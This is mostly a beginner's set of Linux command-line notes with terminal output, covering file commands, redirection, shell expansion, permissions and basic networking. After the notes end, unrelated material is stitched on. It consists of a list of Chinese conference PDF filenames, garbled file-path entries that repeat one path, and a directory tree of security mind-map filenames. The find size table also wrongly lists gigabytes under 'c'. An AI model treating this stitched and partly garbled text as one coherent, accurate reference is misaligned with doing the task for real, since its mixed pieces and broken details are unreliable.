┌──(shreyas㉿kali)-[~/practise]
└─$ ls
commandline hackthebox
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ mkdir dir1 dir2 dir3
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ ls
dir1 dir2 dir3
```
---
- `cp` - copy files and directories
- `cp item1 item2` : copy single file item1 into item2
- `cp item... directory` : copies multiple items (either files or directories) into a directory.
Option | Meaning
--- | ---
`-a`,`--archive` | Copy the files and directories and all of their attributes, including ownerships and permissions.
`-i`, `--interactive` | Before overwriting an existing file, prompt the user for confirmation.
`-r`, `--recursive` | Recursively copy directories and their contents. This option (or the -a option) is required when copying directories.
`-u`, `--update` | When copying files from one directory to another, only copy files that either don’t exist or are newer than the existing corresponding files in the destination directory. This is useful when copying large numbers of files as it skips files that don’t need to be copied
`-v`, `--verbose` | Display informative messages as the copy is performed.
- `mv` is same as `cp`
---
- `rm file` : remove files and directories
Option | Meaning
--- | ---
`-i`, `--interactive` | Before deleting an existing file, prompt the user for confirmation.
`-r`, `--recursive` | Recursively delete directories. This means that if a directory being deleted has subdirectories, delete them too. To delete a directory, this option must be specified.
`-f`, `--force` | Ignore nonexistent files and do not prompt. This overrides the --interactive option.
`-v`, `--verbose` | Display informative messages as the deletion is performed.
---
- `ln` : create links
- `ln file link` : create a hard link
- `ln -s item link` : creates a symbolic link
---
## 𝐖𝐨𝐫𝐤𝐢𝐧𝐠 𝐰𝐢𝐭𝐡 𝐜𝐨𝐦𝐦𝐚𝐧𝐝𝐬
- `type`: is a shell builtin that displays the kind of command the shell will execute
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ type ls
ls is an alias for ls --color=auto
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ type ssh
ssh is /usr/bin/ssh
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ type cd
cd is a shell builtin
```
---
- `which` : Display an Executable’s Location
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ which ls
ls: aliased to ls --color=auto
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ which pwd
pwd: shell built-in command
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ which cd
cd: shell built-in command
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ which gedit
/usr/bin/gedit
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ which firefox
/usr/bin/firefox
```
---
- `man` : Display a Program’s Manual Page
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ man ls
```
```
LS(1) User Commands LS(1)
NAME
ls - list directory contents
SYNOPSIS
ls [OPTION]... [FILE]...
DESCRIPTION
List information about the FILEs (the current directory by default). Sort
entries alphabetically if none of -cftuvSUX nor --sort is specified.
Mandatory arguments to long options are mandatory for short options too.
-a, --all
do not ignore entries starting with .
-A, --almost-all
do not list implied . and ..
--author
with -l, print the author of each file
Manual page ls(1) line 1 (press h for help or q to quit)
```
---
- `apropos` - Display Appropriate Commands
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ apropos copy
cifsdd (8) - convert and copy a file over SMB
COPY (7) - copy data between a file and a table
cp (1) - copy files and directories
cpgr (8) - copy with locking the given file to the password or group file
cpio (1) - copy files to and from archives
cppw (8) - copy with locking the given file to the password or group file
dd (1) - convert and copy a file
debconf-copydb (1) - copy a debconf database
git-checkout-index (1) - Copy files from the index to the working tree
gvfs-copy (1) - Deprecated equivalent of gio copy
install (1) - copy files and set attributes
mariadb-hotcopy (1) - a database backup program
mysqlhotcopy (1) - a database backup program
ntfscp (8) - copy file to an NTFS volume.
objcopy (1) - copy and translate object files
ptrepack (1) - Copy any PyTables Leaf, Group or complete subtree into anothe...
rcp (1) - OpenSSH secure file copy
rsync (1) - a fast, versatile, remote (and local) file-copying tool
scp (1) - OpenSSH secure file copy
ssh-copy-id (1) - use locally available keys to authorise logins on a remote ma...
svnversion (1) - Produce a compact version identifier for a working copy.
vfs_shadow_copy (8) - Expose snapshots to Windows clients as shadow copies.
vfs_shadow_copy2 (8) - Expose snapshots to Windows clients as shadow copies.
x86_64-linux-gnu-objcopy (1) - copy and translate object files
```
---
- `whatis` : Display One-line Manual Page Descriptions
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ whatis rm
rm (1) - remove files or directories
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ whatis ls
ls (1) - list directory contents
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ whatis sudo
sudo (8) - execute a command as another user
```
---
- `info` : Display a Program’s Info Entry
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ info ls
```
```
Next: dir invocation, Up: Directory listing
10.1 ‘ls’: List directory contents
==================================
The ‘ls’ program lists information about files (of any type, including
directories). Options and file arguments can be intermixed arbitrarily,
as usual.
For non-option command-line arguments that are directories, by
default ‘ls’ lists the contents of directories, not recursively, and
omitting files with names beginning with ‘.’. For other non-option
arguments, by default ‘ls’ lists just the file name. If no non-option
argument is specified, ‘ls’ operates on the current directory, acting as
if it had been invoked with a single argument of ‘.’.
By default, the output is sorted alphabetically, according to the
locale settings in effect.(1) If standard output is a terminal, the
output is in columns (sorted vertically) and control characters are
output as question marks; otherwise, the output is listed one per line
and control characters are output as-is.
-----Info: (coreutils)ls invocation, 56 lines --Top------------------------------------
Follow xref: gument is specified, ‘ls’ operates on the current directory, acting asif
```
---
- `alias` : Creating Our Own Commands with alias
- `trick: It’s possible to put more than one command on a line by separating each command with a semicolon`
- `command1; command2; command3...`
```
[me@linuxbox ~]$ cd /usr; ls; cd -
bin games include lib local sbin share src
/home/me
[me@linuxbox ~]$
```
```
[me@linuxbox ~]$ type foo
bash: type: foo: not found
```
```
[me@linuxbox ~]$ alias foo='cd /usr; ls; cd -'
[me@linuxbox ~]$ foo
bin games include lib local sbin share src
/home/me
[me@linuxbox ~]$
[me@linuxbox ~]$ type foo
foo is aliased to `cd /usr; ls; cd -'
```
```
[me@linuxbox ~]$ unalias foo
[me@linuxbox ~]$ type foo
bash: type: foo: not found
```
---
## 𝐑𝐞𝐝𝐢𝐫𝐞𝐜𝐭𝐢𝐨𝐧
- `<command> > <file>` : Redirecting Standard Output
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ ls -l /usr/bin > ls-output.txt
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ ls -l
total 180
drwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir1
drwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir2
drwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir3
-rw-r--r-- 1 shreyas shreyas 171639 Jan 4 18:21 ls-output.txt
```
---
- `command >> file` - append redirected output to a file instead of overwriting the file
```
[me@linuxbox ~]$ ls -l /usr/bin >> ls-output.txt
```
---
- `0>` OR `<` : redirecting standard input
- `>` : redirecting standard output
- `2>` : redirecting standard error
```
[me@linuxbox ~]$ ls -l /bin/usr 2> ls-error.txt
```
---
- `ls -l /bin/usr > ls-output.txt 2>&1` OR ` ls -l /bin/usr &> ls-output.txt`: Redirecting Standard Output and Standard Error to One File
- `ls -l /bin/usr 2> /dev/null` : Disposing unwanted output
---
- `command1 | command2` : Pipeline
- `wc` : Print line, Word, and Byte counts
- `grep` : print line matching pattern
- `head -n <number of lines> ls-output.txt` : print initial lines of file
- `tail -n <number of lines> ls-output.txt` : print last lines of files
- `tee` : Read from Stdin and Output to Stdout and Files
-
```
┌──(shreyas㉿kali)-[~/practise/commandline]
└─$ wc ls-output.txt
2557 24294 171639 ls-output.txt
```
```
[me@linuxbox ~]$ head -n 5 ls-output.txt
total 343496
-rwxr-xr-x 1 root root 31316 2017-12-05 08:58 [
-rwxr-xr-x 1 root root 8240 2017-12-09 13:39 411toppm
-rwxr-xr-x 1 root root 111276 2017-11-26 14:27 a2p
-rwxr-xr-x 1 root root 25368 2016-10-06 20:16 a52dec
[me@linuxbox ~]$ tail -n 5 ls-output.txt
-rwxr-xr-x 1 root root 5234 2017-06-27 10:56 znew
-rwxr-xr-x 1 root root 691 2015-09-10 04:21 zonetab2pot.py
-rw-r--r-- 1 root root 930 2017-11-01 12:23 zonetab2pot.pyc
-rw-r--r-- 1 root root 930 2017-11-01 12:23 zonetab2pot.pyo
lrwxrwxrwx 1 root root 6 2016-01-31 05:22 zsoelim -> soelim
```
---
## 𝐒𝐞𝐞𝐢𝐧𝐠 𝐭𝐡𝐞 𝐰𝐨𝐫𝐥𝐝 𝐚𝐬 𝐭𝐡𝐞 𝐬𝐡𝐞𝐥𝐥 𝐬𝐞𝐞𝐬 𝐢𝐭
- `echo` : Display a line of text
- `echo *` : works same as `ls`
- `echo D*` : Display files/directories which starts with D
- `echo *s` : Display files/drectories which ends with s
- `echo [[:upper:]]*` : Display files/directories that starts with uppercase letters
- `echo /usr/*/share` : display all directories between /usr/ & /share
- `echo ~` : tilde expansion
```
┌──(shreyas㉿kali)-[~]
└─$ echo hello there my name is shreyas
hello there my name is shreyas
┌──(shreyas㉿kali)-[~]
└─$ echo *
BugBounty Desktop Documents Downloads Music Pictures practise Public Templates Videos
┌──(shreyas㉿kali)-[~]
└─$ echo D*
Desktop Documents Downloads
┌──(shreyas㉿kali)-[~]
└─$ echo *s
Documents Downloads Pictures Templates Videos
┌──(shreyas㉿kali)-[~]
└─$ echo [[:upper:]]*
BugBounty Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(shreyas㉿kali)-[~]
└─$ echo /usr/*/share
/usr/local/share
┌──(shreyas㉿kali)-[~]
└─$ echo ~
/home/shreyas
```
- Arithmetic Expansion:
- `$((expression))`
```
┌──(shreyas㉿kali)-[~]
└─$ echo $((2 + 2))
4
┌──(shreyas㉿kali)-[~]
└─$ echo $(($((5**2)) * 3))
75
```
Operator | Description
--- | ---
`+` | Addition
`-` | Subtraction
`*` | Multiplication
`/` | Division (but remember, since expansion supports only integer arithmetic, results are integers)
`%` | Modulo, which simply means “remainder”
`**` | Exponentiation
- Brace Expansion: create multiple text strings from a pattern containing braces
```
┌──(shreyas㉿kali)-[~]
└─$ echo Front-{A,B,C}-Back
Front-A-Back Front-B-Back Front-C-Back
┌──(shreyas㉿kali)-[~]
└─$ echo Number_{1..5}
Number_1 Number_2 Number_3 Number_4 Number_5
┌──(shreyas㉿kali)-[~]
└─$ echo {01..15}
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15
┌──(shreyas㉿kali)-[~]
└─$ echo a{A{1,2},B{3,4}}b
aA1b aA2b aB3b aB4b
```
- Parameter expansion: `echo $var`
- Command Substitution
- `echo $(ls)`
- `ls -l $(which cp)`
- `file $(ls -d /usr/bin/* | grep zip)`
---
- Quoting:
- Double Quotes: If we place text inside double quotes, all the special characters used by the shell lose their special meaning and are treated as ordinary characters. The exceptions are $ (dollar sign), \ (backslash), and ` (backtick).
- Single Quotes: If we need to suppress all expansions, we use single quotes.
- Escaping Characters:
- `\` : is used for escaping
- Backslash Escape Situation:
Escape Sequence | Meaning
--- | ---
`\a` | Bell (an alert that causes the computer to beep)
`\b` | Backspace
`\n` | Newline; on Unix-like systems, this produces a line feed
`\r` | Carriage return
`\t` | tab
```
┌──(shreyas㉿kali)-[~]
└─$ sleep 10; echo -e "Time's up\a"
Time's up
```
---
## 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐝 𝐊𝐞𝐲𝐛𝐨𝐚𝐫𝐝 𝐓𝐫𝐢𝐜𝐤𝐬
- `clear` : Clear the terminal screen
- `history` : Display or manipulate the history list
- Cursor Movement:
Key | Action
--- | ---
`CTRL-A` | Move the cursor to the beginning of line
`CTRL-E` | Move cursor to the end of the line
`CTRL-F` | Move cursor forward one character; same as the right arrow key
`CTRL-B` | Move cursor backward one character; same as the left arrow key
`ALT-F` | Move cursor one word forward
`ALT-B` | Move cursor backward one word
`CTRL-L` | Clear screen and move the cursor to the top left corner. Same as `clear` command
---
- Modifying Text
Key | Action
--- | ---
`CTRL-D` | Delete the character at the cursor location
`CTRL-T` | Transpose the character at the cursor location
`ALT-T` | Transpose the word at the cursor location with the one preceding it.
`ALT-L` | Convert the characters from the cursor location to the end of the word to lowercase.
`ALT-U` | Convert the characters from the cursor location to the end of the word to uppercase.
---
- History Expansion
Sequence | Action
--- | ---
`!!` | Repeat the last command. It is probably easier to press the up arrow and ENTER
`!number` | Repeat history list item `number`.
`!string` | Repeat last history list item starting with `string`
`!?string` | Repeat last history list item containing `string`
---
## 𝐏𝐞𝐫𝐦𝐢𝐬𝐬𝐢𝐨𝐧𝐬
- `id` : Display user identity
- `chmod` : Change a file’s mode
- `umask` : Set the default file permissions
- `su` : Run a shell as another user
- `sudo` : Execute a command as another user
- `chown`: Change a file’s owner
- `chgrp`: Change a file’s group ownership
- `passwd`: Change a user’s password
- Permission attribute Examples:
File Attributes | Meaning
--- | ---
`-rwx------` | A regular file that is readable, writable, and executable by the file’s owner. No one else has any access.
`-rw-------` | A regular file that is readable and writable by the file’s owner. No one else has any access.
`-rw-r--r--` | A regular file that is readable and writable by the file’s owner. Members of the file’s owner group may read the file. The file is world-readable.
`-rwxr-xr-x` | A regular file that is readable, writable, and executable by the file’s owner. The file may be read and executed by everybody else.
`-rw-rw----` | A regular file that is readable and writable by the file’s owner and members of the file’s group owner only.
`lrwxrwxrwx` | A symbolic link. All symbolic links have “dummy” permissions. The real permissions are kept with the actual file pointed to by the symbolic link.
`drwxrwx---` | A directory. The owner and the members of the owner group may enter the directory and create, rename, and remove files within the directory.
`drwxr-x---` | A directory. The owner may enter the directory and create, rename, and delete files within the directory. Members of the owner group may enter the directory but cannot create, delete, or rename files.
---
- `chmod` : Change File Mode
- 6(rw-)
- 7(rwx)
- 5(r-x)
- 4(r--)
- 0(---)
Symbol | Meaning
--- | ---
`u` | Short for "user" but means the file or directory owner.
`g` | Group owner
`o` | Short for "others" but means world
`a` | Short for "all". This is a combination of `u`, `g`, and `o`.
- If no character is specified, “all” will be assumed. The operation may be a + indicating that a permission is to be added, a - indicating that a permission is to be taken away, or a = indicating that only the specified permissions are to be applied and that all others are to be removed.
Notation | Meaning
--- | ---
`u+x` | Add execute permission for the owner.
`u-x` | Remove execute permission from the owner.
`+x` | Add execute permission for the owner, group, and world. This is equivalent to a+x.
`o-rw` | Remove the read and write permissions from anyone besides the owner and group owner.
`go=rw` | Set the group owner and anyone besides the owner to have read and write permissions. If either the group owner or the world previously had execute permission, it is removed.
`u+x,go=rx` | Add execute permission for the owner and set the permissions for the group and others to read and execute. Multiple specifications may be separated by commas.
---
## 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐬
- `ps` : Report a snapshot of current processes
- `top` : Display tasks
- `jobs` : List active jobs
- `bg` : Place a job in the background
- `fg` : Place a job in the foreground
- `kill` : Send a signal to a process
- `killall` : Kill process by name
- `shutdown` : Shut down or reboot the system
---
## 𝐍𝐞𝐭𝐰𝐨𝐫𝐤𝐢𝐧𝐠
- `ping` : Checks if a network is reachable, `ping` command sends a special network packet called an `ICMP ECHO_REQUEST` to a specified host. Most network devices receiving this packet will reply to it, allowing the network connection to be verified.
```
┌──(shreyas㉿kali)-[~]
└─$ ping youtube.com
PING youtube.com (142.250.204.46) 56(84) bytes of data.
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=1 ttl=128 time=149 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=2 ttl=128 time=151 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=3 ttl=128 time=188 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=4 ttl=128 time=140 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=5 ttl=128 time=139 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=6 ttl=128 time=120 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=7 ttl=128 time=131 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=8 ttl=128 time=148 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=9 ttl=128 time=137 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=10 ttl=128 time=132 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=11 ttl=128 time=144 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=12 ttl=128 time=128 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=13 ttl=128 time=128 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=14 ttl=128 time=141 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=15 ttl=128 time=135 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=16 ttl=128 time=130 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=17 ttl=128 time=133 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=18 ttl=128 time=142 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=19 ttl=128 time=134 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=20 ttl=128 time=137 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=21 ttl=128 time=139 ms
^C64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=22 ttl=128 time=140 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=23 ttl=128 time=121 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=24 ttl=128 time=146 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=25 ttl=128 time=136 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=26 ttl=128 time=165 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=27 ttl=128 time=176 ms
64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=28 ttl=128 time=132 ms
^C
--- youtube.com ping statistics ---
28 packets transmitted, 28 received, 0% packet loss, time 27045ms
rtt min/avg/max/mdev = 120.372/140.817/187.758/14.526 ms
```
---
- `traceroute` : lists all the “hops” network traffic takes to get from the local system to a specified host.
```
┌──(shreyas㉿kali)-[~]
└─$ traceroute google.com
traceroute to google.com (142.250.204.110), 30 hops max, 60 byte packets
1 192.168.29.2 (192.168.29.2) 0.227 ms 0.099 ms 0.175 ms
2 * * *
3 * * *
4 * * *
5 * * *
6 * * *
7 * * *
8 * * *
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
```
---
- `ip a` : It replaces the earlier and now deprecated `ifconfig` program.
```
┌──(shreyas㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:c5:88:a0 brd ff:ff:ff:ff:ff:ff
inet 192.168.x.x/24 brd 192.168.x.x scope global dynamic noprefixroute eth0
valid_lft 1630sec preferred_lft 1630sec
inet6 fe80::20c:29ff:x:x/64 scope link noprefixroute
valid_lft forever preferred_lft forever
```
---
- `netstat` : The netstat program is used to examine various network settings and statistics.
- `-r` option will display the kernel’s network routing table
- `ie` : we can examine the network interfaces in our system
```
┌──(shreyas㉿kali)-[~]
└─$ netstat -ie
Kernel Interface table
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.x.x netmask 255.255.255.0 broadcast 192.168.29.255
inet6 fe80::20c:29ff:x:x prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:c5:88:a0 txqueuelen 1000 (Ethernet)
RX packets 102 bytes 11285 (11.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 207 bytes 17053 (16.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 400 (400.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 400 (400.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(shreyas㉿kali)-[~]
└─$ netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
default 192.168.29.2 0.0.0.0 UG 0 0 0 eth0
192.168.29.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
```
---
Transporting Files over a Network
- `ftp` : `ftp` is used to communicate with FTP servers, machines that contain files that can be uploaded and downloaded over a network. `FTP` (in its original form) is not secure because it sends account names and passwords in cleartext.
```
[me@linuxbox ~]$ ftp fileserver
Connected to fileserver.localdomain.
220 (vsFTPd 2.0.1)
Name (fileserver:me): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub/cd_images/ubuntu-18.04
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 500 500 733079552 Apr 25 03:53 ubuntu-18.04-desktop-amd64.iso
226 Directory send OK.
ftp> lcd Desktop
Local directory now /home/me/Desktop
ftp> get ubuntu-18.04-desktop-amd64.iso
local: ubuntu-18.04-desktop-amd64.iso remote: ubuntu-18.04-desktop-amd64.iso
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ubuntu-18.04-desktop-amd64.iso (733079552 bytes).
226 File send OK.
733079552 bytes received in 68.56 secs (10441.5 kB/s)
ftp> bye
```
Command | Meaning
--- | ---
`ftp fileserver` | Invoke the `ftp` program and have it connect the FTP server `fileserver`
`anonymous` | Login name. After the login prompt, a password prompt will appear. Some servers will accept a blank password; others will require a password in the form of an email address. In that case, try something like user@example.
`cd` | change directory
`ls` | list directory
`lcd Desktop` | Change the directory on the local system to ~/Desktop. In the example, the ftp program was invoked when the working directory was ~. This command changes the working directory to ~/Desktop.
`get` | transfer file from remote server to local system
`bye` | Log off the remote server and end the ftp program session. The commands quit and exit may also be used.
- `lftp` is a Better ftp
---
- `wget` : It is useful for downloading content from both web and FTP sites. Single files, multiple files, and even entire sites can be downloaded.
```
[me@linuxbox ~]$ wget http://linuxcommand.org/index.php
--11:02:51-- http://linuxcommand.org/index.php
=> `index.php'
Resolving linuxcommand.org... 66.35.250.210
Connecting to linuxcommand.org|66.35.250.210|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 3,120 --.--K/s
11:02:51 (161.75 MB/s) - `index.php' saved [3120]
```
---
- `ssh` : SSH solves the two basic problems of secure communication with a remote host.
- It authenticates that the remote host is who it says it is (thus preventing so-called man-in-the-middle attacks).
- It encrypts all of the communications between the local and remote hosts.
- `ssh remote-sys` : To connect to a remote host named remote-sys
- `ssh username@remote-sys` : login with specific username
- `ssh remote-sys <command>`: to execute just a single command
```
[me@linuxbox ~]$ ssh remote-sys
The authenticity of host 'remote-sys (192.168.1.4)' can't be established.
RSA key fingerprint is 41:ed:7a:df:23:19:bf:3c:a5:17:bc:61:b3:7f:d9:bb.
Are you sure you want to continue connecting (yes/no)?
```
---
- `scp` - (secure copy). copy files from local host to remote host
```
[me@linuxbox ~]$ scp remote-sys:document.txt .
me@remote-sys's password:
document.txt 100% 5581 5.5KB/s 00:00
[me@linuxbox ~]$
```
- `sftp` : SSH file-copying program
```
[me@linuxbox ~]$ sftp remote-sys
Connecting to remote-sys...
me@remote-sys's password:
sftp> ls
ubuntu-8.04-desktop-i386.iso
sftp> lcd Desktop
sftp> get ubuntu-8.04-desktop-i386.iso
Fetching /home/me/ubuntu-8.04-desktop-i386.iso to ubuntu-8.04-desktop-i386.iso
/home/me/ubuntu-8.04-desktop-i386.iso 100% 699MB 7.4MB/s 01:35
sftp> bye
```
---
## 𝐒𝐞𝐚𝐫𝐜𝐡𝐢𝐧𝐠 𝐟𝐨𝐫 𝐟𝐢𝐥𝐞𝐬
- `locate` : Find files by name
- `find` : Search for files in a directory hierarchy
- `xargs ` : Build and execute command lines from standard input
- `touch` : Change file times
- `stat`: Display file or file system status
---
- `find` : find files the hard way
- `find ~` : to produce a listing of our home directory
- `find ~ | wc -l` : to count the number of files.
- `find ~ -type d | wc -l` : `-type d` limit the search to directories
- `find ~ -type f | wc -l` : `-type f` limit the search to regular files
- `find ~ -type f -name "*.JPG" -size +1M | wc -l`: all the regular files that match the wildcard pattern *.JPG and are larger than one megabyte
File type | Description
--- | ---
`b` | Block special device file
`c` | Character special device file
`d` | Directory
`f` | Regular file
`l` | Symbolic link
- find size units
Character | Unit
--- | ---
`b` | 512-byte blocks. This is default if no unit is specified.
`c` | Bytes
`w` | 2-byte words
`k` | Kilobytes (units of 1,024 bytes)
`M` | Megabytes (units of 1,048,576 bytes)
`c` | Gigabytes (units of 1,073,741,824 bytes)
- More about `find` options: [Find cheatsheet](https://github.com/shreyaschavhan/linux-commands-cheatsheet/blob/main/find-cheatsheet.md)
---
- `xargs` - It accepts input from standard input and converts it into an argument list for a specified command
```
find ~ -type f -name 'foo*' -print | xargs ls -l
-rwxr-xr-x 1 me me 224 2007-10-29 18:44 /home/me/bin/foo
-rw-r--r-- 1 me me 0 2016-09-19 12:53 /home/me/foo.txt
```
---
Remaining:
- archiving and backup
- regular expressions
- text processing
- compiling programs
- that's enough for now i guess
|
## 2019-3-files
(可上传)张军-Paypal+AI+compute+platform+(002)-终稿.pdf
2018-10+-+Reactive+Applications+with+Vert.x+-+QCon.pdf
2018-10+-+Real-world+HTTP+performance+benchmarking+-+QCon.pdf
【可以上传】19日上1_陈喆_Paypal的持续交付体系.pdf
【可以上传】19日上3张甲磊-DevCloud+on+DevCloud每日10次发布效率提升实践(QCon上海2018).pdf
【可以公开】10.19+下午第一场+欧阳坚-美团容器技术研发实践v1.2.pdf
【可以公开】10.19+宴会厅2+下午第三场+王强-ApacheRocketMQ事务消息.pdf
【可以公开】10.20+上午第一场+新型内容刘服务架构方式+范怀宇-终稿.pdf
【可以公开】10.20+宴会2++下午第一场+钮博彦-研发度量-final.pdf
【可以公开】10.20+宴会2+下午第二场+姚旭+从硅谷到中关村到底有多远.pdf
【可以公开】10.20+宴会2+下午第四场+施翔+如何打造7X24H交付通道v2.0.pdf
【可以公开】10.20宴会2++下午第三场+徐毅-五星级软件工程师的高效秘诀.pdf
【可以公开】18下2-新型内容刘服务架构方式-邱岳【1.6】.pdf
【可以公开】19日下1QCon上海2018-倪益杰-51信用卡6年上市我在技术团队的成长历程-公开版.pdf
可上传终稿-粟海-浅谈Kafka+Streams在实时跟踪和监控系统中的应用.pdf
最终版-沈礼-蚂蚁金服-蚂蚁亿级金融业务的前端实践.pdf
(可发布)图数据库应用案例解析-常新宇.pdf
linux Web服务安全.xmind 2019/3/files/linux/linux Web服务安全.xmind 14 months ago
linux 环境部署.xmind 2019/3/files/linux/linux Web服务安全.xmind 14 months ago
linux常用命令.docx 2019/3/files/linux/linux Web服务安全.xmind 14 months ago
linux常用命令.mmap 2019/3/files/linux/linux Web服务安全.xmind 14 months ago
linux常用命令.xmind 2019/3/files/linux/linux Web服务安全.xmind 14 months ago
目前包含如下的一些图片:
```
.
├── CTF资料
│ ├── CTF攻防部署.png
│ └── CTF题目工具资源.png
├── source
│ ├── ADO.Net汇总~最新版.xmind
│ ├── CSS.mmap
│ ├── HTML笔记.mmap
│ ├── JavaScriptBase.mmap
│ ├── JavaWeb应用安全.xmind
│ ├── JQurery自学笔记.mmap
│ ├── SQL常用汇总.xmind
│ ├── SQL汇总.xmind
│ ├── 安全技能树.mm
│ └── 安全技能树.xmind
├── Web安全
│ ├── 02.信息安全-工作范围.png
│ ├── 03.信息安全-解决方案.png
│ ├── 2012sec_event.jpg
│ ├── DDoS攻击及对策.jpg
│ ├── JavaWeb应用安全.png
│ ├── JavaWeb简介.png
│ ├── Jboss引起的内网渗透.png
│ ├── Maltego使用导图.jpg
│ ├── Meterpreter Cheat Sheet.pdf
│ ├── P2P-security.png
│ ├── pentester.jpg
│ ├── pentest_method.jpg
│ ├── PHP代码审计脑图.png
│ ├── PHP源码审计.png
│ ├── powershell语法.png
│ ├── PTES_MindMap_CN1.pdf
│ ├── Python代码审计脑图.jpg
│ ├── Python系统审计.jpg
│ ├── SEO-Cheatsheet.png
│ ├── SEO导图.gif
│ ├── SSRF漏洞挖掘脑图.jpg
│ ├── t00ls_入侵感知图.png
│ ├── WEB2HACK.jpg
│ ├── web-内网基本流程小结.jpg
│ ├── Web安全.jpg
│ ├── Web安全.png
│ ├── Web安全技术点.jpg
│ ├── Web常见漏洞脑图.png
│ ├── Web应用安全(By Neeao).jpg
│ ├── web应用测试.jpg
│ ├── Web指纹分析方法.png
│ ├── Web攻击及防御技术.png
│ ├── Web服务器入侵防御.jpg
│ ├── Web架构中的安全问题.png
│ ├── web渗透.jpg
│ ├── WIKI渗透测试流程图.png
│ ├── Windows_Hacker学习路线图.jpg
│ ├── XML安全汇总.png
│ ├── XSS2.png
│ ├── xss virus 1.0 (余弦).png
│ ├── XSS利用架构图.jpg
│ ├── XSS攻击点汇总.png
│ ├── XSS脑图.png
│ ├── 中国黑阔技术金字塔.png
│ ├── 主流测试工具分类.jpg
